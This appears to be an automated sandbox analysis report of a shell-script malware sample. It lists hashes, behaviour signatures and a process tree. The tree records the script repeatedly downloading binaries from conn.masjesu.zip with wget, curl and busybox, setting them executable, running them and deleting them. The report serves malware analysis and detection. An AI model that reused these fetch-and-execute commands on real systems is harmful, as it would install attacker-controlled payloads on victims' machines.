Analysis
-
max time kernel
146s -
max time network
148s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
21/10/2024, 01:39
Static task
static1
Behavioral task
behavioral1
Sample
b59925aedbe7efc35a7f09ff6f8e186a7a09f662bfb6d538f88de221f280fc30.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
b59925aedbe7efc35a7f09ff6f8e186a7a09f662bfb6d538f88de221f280fc30.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
b59925aedbe7efc35a7f09ff6f8e186a7a09f662bfb6d538f88de221f280fc30.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
b59925aedbe7efc35a7f09ff6f8e186a7a09f662bfb6d538f88de221f280fc30.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
b59925aedbe7efc35a7f09ff6f8e186a7a09f662bfb6d538f88de221f280fc30.sh
-
Size
10KB
-
MD5
b9ad3b4d531f384be07b7d4aa81a5b72
-
SHA1
ebe6f66e8450612015e404c679b5b0196cebcecc
-
SHA256
b59925aedbe7efc35a7f09ff6f8e186a7a09f662bfb6d538f88de221f280fc30
-
SHA512
b97e2d58000db3fb1342b6ef83b948820f4812618f29899f1577ed686b34e649b8663b65dc4c11760502353bfbb5bb367d7a5f981c1696a84b558f7d6e222bd1
-
SSDEEP
192:1Iz9tYb3++kELeypwSrSxvE5/qvEPP9tYb32kELeyTJ:1I1+kELeyqaSxvE4vErkELeyV
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 15 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 743 chmod 867 chmod 875 chmod 828 chmod 851 chmod 906 chmod 914 chmod 922 chmod 736 chmod 883 chmod 890 chmod 898 chmod 835 chmod 843 chmod 859 chmod -
Executes dropped EXE 15 IoCs
ioc pid Process /tmp/T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c 737 T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c /tmp/LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F 744 LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F /tmp/rpPbXQSsqwMYb1v7YyxwxMStI947794Fs6 829 rpPbXQSsqwMYb1v7YyxwxMStI947794Fs6 /tmp/LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt 836 LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt /tmp/PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL 844 PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL /tmp/lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI 852 lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI /tmp/MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH 860 MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH /tmp/5CKo3K5gnwvhtrX3u6wOymHMvKqzGDw8FG 868 5CKo3K5gnwvhtrX3u6wOymHMvKqzGDw8FG /tmp/PbwpTDYOlnDgBhcSFldzcUvxM9x053H2Kx 876 PbwpTDYOlnDgBhcSFldzcUvxM9x053H2Kx /tmp/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB 884 JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB /tmp/z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW 891 z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW /tmp/ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW 899 ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW /tmp/Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst 907 Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst /tmp/8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI 915 8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI /tmp/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB 923 JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 46 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 871 wget 872 curl 925 wget 887 curl 897 busybox 739 wget 746 wget 855 wget 886 wget 842 busybox 847 wget 863 wget 866 busybox 711 wget 733 busybox 740 curl 834 busybox 910 wget 880 curl 894 wget 902 wget 905 busybox 921 busybox 840 curl 882 busybox 889 busybox 895 curl 724 curl 747 curl 919 curl 874 busybox 903 curl 911 curl 831 wget 832 curl 858 busybox 864 curl 913 busybox 918 wget 742 busybox 839 wget 848 curl 850 busybox 794 busybox 856 curl 879 wget -
Writes file to tmp directory 15 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt curl File opened for modification /tmp/Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst curl File opened for modification /tmp/lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI curl File opened for modification /tmp/5CKo3K5gnwvhtrX3u6wOymHMvKqzGDw8FG curl File opened for modification /tmp/PbwpTDYOlnDgBhcSFldzcUvxM9x053H2Kx curl File opened for modification /tmp/T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c curl File opened for modification /tmp/rpPbXQSsqwMYb1v7YyxwxMStI947794Fs6 curl File opened for modification /tmp/PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL curl File opened for modification /tmp/MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH curl File opened for modification /tmp/z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW curl File opened for modification /tmp/8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI curl File opened for modification /tmp/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB curl File opened for modification /tmp/LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F curl File opened for modification /tmp/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB curl File opened for modification /tmp/ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW curl
Processes
-
/tmp/b59925aedbe7efc35a7f09ff6f8e186a7a09f662bfb6d538f88de221f280fc30.sh/tmp/b59925aedbe7efc35a7f09ff6f8e186a7a09f662bfb6d538f88de221f280fc30.sh1⤵PID:703
-
/bin/rm/bin/rm bins.sh2⤵PID:706
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c2⤵
- System Network Configuration Discovery
PID:711
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:724
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c2⤵
- System Network Configuration Discovery
PID:733
-
-
/bin/chmodchmod 777 T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c2⤵
- File and Directory Permissions Modification
PID:736
-
-
/tmp/T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c./T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c2⤵
- Executes dropped EXE
PID:737
-
-
/bin/rmrm T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c2⤵PID:738
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F2⤵
- System Network Configuration Discovery
PID:739
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:740
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F2⤵
- System Network Configuration Discovery
PID:742
-
-
/bin/chmodchmod 777 LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F2⤵
- File and Directory Permissions Modification
PID:743
-
-
/tmp/LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F./LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F2⤵
- Executes dropped EXE
PID:744
-
-
/bin/rmrm LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F2⤵PID:745
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/rpPbXQSsqwMYb1v7YyxwxMStI947794Fs62⤵
- System Network Configuration Discovery
PID:746
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/rpPbXQSsqwMYb1v7YyxwxMStI947794Fs62⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:747
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/rpPbXQSsqwMYb1v7YyxwxMStI947794Fs62⤵
- System Network Configuration Discovery
PID:794
-
-
/bin/chmodchmod 777 rpPbXQSsqwMYb1v7YyxwxMStI947794Fs62⤵
- File and Directory Permissions Modification
PID:828
-
-
/tmp/rpPbXQSsqwMYb1v7YyxwxMStI947794Fs6./rpPbXQSsqwMYb1v7YyxwxMStI947794Fs62⤵
- Executes dropped EXE
PID:829
-
-
/bin/rmrm rpPbXQSsqwMYb1v7YyxwxMStI947794Fs62⤵PID:830
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt2⤵
- System Network Configuration Discovery
PID:831
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:832
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt2⤵
- System Network Configuration Discovery
PID:834
-
-
/bin/chmodchmod 777 LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt2⤵
- File and Directory Permissions Modification
PID:835
-
-
/tmp/LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt./LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt2⤵
- Executes dropped EXE
PID:836
-
-
/bin/rmrm LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt2⤵PID:838
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL2⤵
- System Network Configuration Discovery
PID:839
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:840
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL2⤵
- System Network Configuration Discovery
PID:842
-
-
/bin/chmodchmod 777 PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL2⤵
- File and Directory Permissions Modification
PID:843
-
-
/tmp/PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL./PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL2⤵
- Executes dropped EXE
PID:844
-
-
/bin/rmrm PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL2⤵PID:846
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI2⤵
- System Network Configuration Discovery
PID:847
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:848
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI2⤵
- System Network Configuration Discovery
PID:850
-
-
/bin/chmodchmod 777 lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI2⤵
- File and Directory Permissions Modification
PID:851
-
-
/tmp/lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI./lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI2⤵
- Executes dropped EXE
PID:852
-
-
/bin/rmrm lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI2⤵PID:854
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH2⤵
- System Network Configuration Discovery
PID:855
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:856
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH2⤵
- System Network Configuration Discovery
PID:858
-
-
/bin/chmodchmod 777 MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH2⤵
- File and Directory Permissions Modification
PID:859
-
-
/tmp/MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH./MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH2⤵
- Executes dropped EXE
PID:860
-
-
/bin/rmrm MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH2⤵PID:862
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/5CKo3K5gnwvhtrX3u6wOymHMvKqzGDw8FG2⤵
- System Network Configuration Discovery
PID:863
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/5CKo3K5gnwvhtrX3u6wOymHMvKqzGDw8FG2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:864
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/5CKo3K5gnwvhtrX3u6wOymHMvKqzGDw8FG2⤵
- System Network Configuration Discovery
PID:866
-
-
/bin/chmodchmod 777 5CKo3K5gnwvhtrX3u6wOymHMvKqzGDw8FG2⤵
- File and Directory Permissions Modification
PID:867
-
-
/tmp/5CKo3K5gnwvhtrX3u6wOymHMvKqzGDw8FG./5CKo3K5gnwvhtrX3u6wOymHMvKqzGDw8FG2⤵
- Executes dropped EXE
PID:868
-
-
/bin/rmrm 5CKo3K5gnwvhtrX3u6wOymHMvKqzGDw8FG2⤵PID:870
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/PbwpTDYOlnDgBhcSFldzcUvxM9x053H2Kx2⤵
- System Network Configuration Discovery
PID:871
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/PbwpTDYOlnDgBhcSFldzcUvxM9x053H2Kx2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:872
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/PbwpTDYOlnDgBhcSFldzcUvxM9x053H2Kx2⤵
- System Network Configuration Discovery
PID:874
-
-
/bin/chmodchmod 777 PbwpTDYOlnDgBhcSFldzcUvxM9x053H2Kx2⤵
- File and Directory Permissions Modification
PID:875
-
-
/tmp/PbwpTDYOlnDgBhcSFldzcUvxM9x053H2Kx./PbwpTDYOlnDgBhcSFldzcUvxM9x053H2Kx2⤵
- Executes dropped EXE
PID:876
-
-
/bin/rmrm PbwpTDYOlnDgBhcSFldzcUvxM9x053H2Kx2⤵PID:878
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB2⤵
- System Network Configuration Discovery
PID:879
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:880
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB2⤵
- System Network Configuration Discovery
PID:882
-
-
/bin/chmodchmod 777 JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB2⤵
- File and Directory Permissions Modification
PID:883
-
-
/tmp/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB./JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB2⤵
- Executes dropped EXE
PID:884
-
-
/bin/rmrm JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB2⤵PID:885
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW2⤵
- System Network Configuration Discovery
PID:886
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:887
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW2⤵
- System Network Configuration Discovery
PID:889
-
-
/bin/chmodchmod 777 z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW2⤵
- File and Directory Permissions Modification
PID:890
-
-
/tmp/z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW./z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW2⤵
- Executes dropped EXE
PID:891
-
-
/bin/rmrm z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW2⤵PID:893
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW2⤵
- System Network Configuration Discovery
PID:894
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:895
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW2⤵
- System Network Configuration Discovery
PID:897
-
-
/bin/chmodchmod 777 ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW2⤵
- File and Directory Permissions Modification
PID:898
-
-
/tmp/ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW./ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW2⤵
- Executes dropped EXE
PID:899
-
-
/bin/rmrm ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW2⤵PID:901
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst2⤵
- System Network Configuration Discovery
PID:902
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:903
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst2⤵
- System Network Configuration Discovery
PID:905
-
-
/bin/chmodchmod 777 Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst2⤵
- File and Directory Permissions Modification
PID:906
-
-
/tmp/Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst./Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst2⤵
- Executes dropped EXE
PID:907
-
-
/bin/rmrm Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst2⤵PID:909
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI2⤵
- System Network Configuration Discovery
PID:910
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:911
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI2⤵
- System Network Configuration Discovery
PID:913
-
-
/bin/chmodchmod 777 8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI2⤵
- File and Directory Permissions Modification
PID:914
-
-
/tmp/8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI./8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI2⤵
- Executes dropped EXE
PID:915
-
-
/bin/rmrm 8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI2⤵PID:917
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB2⤵
- System Network Configuration Discovery
PID:918
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:919
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB2⤵
- System Network Configuration Discovery
PID:921
-
-
/bin/chmodchmod 777 JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB2⤵
- File and Directory Permissions Modification
PID:922
-
-
/tmp/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB./JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB2⤵
- Executes dropped EXE
PID:923
-
-
/bin/rmrm JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB2⤵PID:924
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW2⤵
- System Network Configuration Discovery
PID:925
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
114B
MD5546071c6a6aeff34580b4d1a9b35a7c3
SHA1dc2de298837a86d3bc86e8a328411229d9eccdb6
SHA2562d1255033a3f5cde3fb430b15d84ad95c1d7d37b25132cd3dcca7c30963e9f12
SHA512207f333daf98fe653f4f661defd86651cbb50e3482511769d0558d2fd80ce107ec6a519424e05107740a802b444b62445901788d80dde4e8dbc8ee116d5b9be7
-
Filesize
176B
MD5e1732e70f015e99d14dff1eeeaec9966
SHA1c28358cd15b9a0bea63c5b2ed0c9b8d5cb006113
SHA2566de94db8afc535ef95ba6c6290317d20e50312c146186cb86a4210770c1a741e
SHA5126ac4f83ce675f8a7855c18eea51c654f19e66bfa335a5125d06ceb4293ecef3a6a12a4e57809e9531dd13b83e1d591e476973e88094fa361c0847dbdeb5923a7
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97